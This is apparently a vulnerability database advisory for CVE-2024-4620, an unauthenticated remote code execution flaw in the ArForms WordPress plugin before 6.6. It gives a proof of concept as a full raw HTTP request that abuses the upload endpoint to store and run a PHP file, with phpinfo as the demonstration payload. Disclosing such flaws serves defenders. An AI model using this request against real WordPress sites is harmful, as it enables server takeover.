Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpexploitMgthuramoemyintWPEX-ID:DC34DC2D-D5A1-4E28-8507-33F659EAD647
HistoryMay 17, 2024 - 12:00 a.m.

ArForms < 6.6 - Unauthenticated RCE

2024-05-1700:00:00
mgthuramoemyint
32
arforms
unauthenticated
rce
vulnerability
update

9.6 High

AI Score

Confidence

High

0.0004 Low

EPSS

Percentile

9.1%

JSON

Description The plugin allows unauthenticated users to modify uploaded files in such a way that PHP code can be uploaded when an upload file input is included on a form

1. Create a form with an upload input
2. As an unauthenticated user, upload an image file and intercept the request. 
3. Modify it like the following:

```
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: testbox
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X_FILENAME: 3readme.php
X-FILENAME: 3readme.php
Content-Type: multipart/form-data; boundary=---------------------------231372247329806589063676810774
Content-Length: 1110
Origin: http://testbox
Connection: close
Referer: http://testbox/wordpress/index.php/2024/04/08/hello-world/
Cookie: wordpress_ba62313c33aedb7d46cae591be063de4=mirphak%7C17151795;wpforms_fields_group_settings_advanced=true; 45df-a0b7-fdcb263f17ee57190a; PHPSESSID=m0tplmmem0pm28kseu7iola5d7
 
-----------------------------231372247329806589063676810774
Content-Disposition: form-data; name="action"
 
arf_send_form_data
-----------------------------231372247329806589063676810774
Content-Disposition: form-data; name="frm"
 
100
-----------------------------231372247329806589063676810774
Content-Disposition: form-data; name="field_id"
 
gfeav2_58393
-----------------------------231372247329806589063676810774
Content-Disposition: form-data; name="file_type"
 
text/html
-----------------------------231372247329806589063676810774
Content-Disposition: form-data; name="types_arr"
 
htm|html, jpg|jpeg|php
-----------------------------231372247329806589063676810774
Content-Disposition: form-data; name="is_preview"
 
 
-----------------------------231372247329806589063676810774
Content-Disposition: form-data; name="files"; filename="readme.html"
Content-Type: text/html
 
<?phP  phpinfo(); ?>
 
-----------------------------231372247329806589063676810774
Content-Disposition: form-data; name="token"
 
72JcFplqUK
-----------------------------231372247329806589063676810774--
```

Access the file (in the example above it is `3readme.php`) and see the PHP execute.

Related

cve 1
wpvulndb 1
nvd 1
cvelist 1
wordfence 1
cve
cve
CVE-2024-4620
2024-06-07 06:15:11
wpvulndb
wpvulndb
ArForms < 6.6 - Unauthenticated RCE
2024-05-17 00:00:00
nvd
nvd
CVE-2024-4620
2024-06-07 06:15:11
cvelist
cvelist
CVE-2024-4620 ArForms < 6.6 - Unauthenticated RCE
2024-06-07 06:00:02
wordfence
wordfence
Wordfence Intelligence Weekly WordPress Vulnerability Report (May 13, 2024 to May 19, 2024)
2024-05-23 15:00:37

9.6 High

AI Score

Confidence

High

0.0004 Low

EPSS

Percentile

9.1%

JSON
Related for WPEX-ID:DC34DC2D-D5A1-4E28-8507-33F659EAD647
cve1wpvulndb1nvd1cvelist1wordfence1